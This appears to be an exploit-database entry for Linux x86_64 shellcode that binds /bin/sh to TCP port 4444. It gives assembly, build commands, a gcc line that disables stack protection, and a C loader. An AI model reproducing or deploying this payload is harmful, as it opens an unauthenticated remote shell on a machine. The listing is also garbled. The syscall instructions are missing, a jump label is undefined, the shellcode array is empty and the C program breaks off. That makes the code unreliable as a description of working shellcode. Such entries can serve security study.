Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

ID: 101582
CVE: None
Download vulnerable application: None
;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length:  131 bytes
;github =	
;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 4444"

================== ASSEMBLY ========================================

global _start

section .text

	xor rsi,	rsi	;set rsi to zero, since we will push syscall and first param on the stack and then pop it of we don't need to
				;set rax and rdi to zero

	;int socket(int domain, int type, int protocol);
	push 41			;sys_socket
	pop rax
	push 2
	pop rdi	
	inc rsi			;SOCK_STREAM
	xor rdx,	rdx

	;save the return value for future use
	xchg rdi, rax

	; sin_zero:        0
	; sin_addr.s_addr: INADDR_ANY = 0
	; sin_port:        4444 
	; sin_family:      AF_INET = 2
	xor rax, rax
	push rax			; sin_zero 
	push rax			; zero out another 8 bytes for remaining members
	mov word [rsp+2], 0x5c11	; sin_port = 4444
	mov byte [rsp], 0x2		; sin_family

	;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
	xor 	rdx,	rdx	
	push 	49
	pop 	rax
	push	rsp	
	pop 	rsi		;sockaddr stack pointer
	add	rdx,	16	;sizeof sockaddr

	;int listen(int sockfd, int backlog);
	xor     rsi,	rsi
	push 	50		;sys_listen
	pop 	rax
	inc 	rsi		;backlog = number of clients 

	;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
	push 	43 		;sys_accept
	pop 	rax
	mov rsi, rsp		; stack pointer for client sockaddr
	mov byte [rsp-1], 0x10	; put size of the structure on the stack
	dec rsp			; adjust stack pointer for previous
	mov rdx, rsp		; stack pointer for struct size

	;save client socket 
	xchg r10,	 rax

	;int close(int fd);
	push	3		;sys_close
	pop 	rax
	push	rax		;save 3 on the stack for rsi in dup2

	xchg    rdi,	r10	;client socket as first parameter for dup2
	pop 	rsi
	;int dup2(int oldfd, int newfd);
	push	33		;sys_dup2
	pop	rax
	dec 	rsi		
	loopnz  dup2loop	

	;int execve(const char *filename, char *const argv[], char *const envp[]);
	xor eax,	eax
	add al,		59			;sys_execve
	xor rdi,	rdi			;set rdi to zero
	push rdi				;push null on the stack
	mov rdi,	0x68732F2f6e69622F	;bin//sh in reverse
	push rdi				
	mov rdi,	rsp			;set stack pointer to rdi
	xor rsi,	rsi			;rsi and rdx == 0
	xor rdx,	rdx

=======Generate Shellcode==========================================
nasm -felf64 tcp_bind.nasm -o tcp_bind.o 
ld tcp_bind.o -o tcp_bind

=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack bind.c -o bind

======================C program=====================================

#include <stdio.h>
#include <string.h>

unsigned char shellcode[]=\

int main(){

        printf("length of your shellcode is: %d\n", (int)strlen(shellcode));

        int (*ret)() = (int(*)())shellcode;

1.3.0 (www01)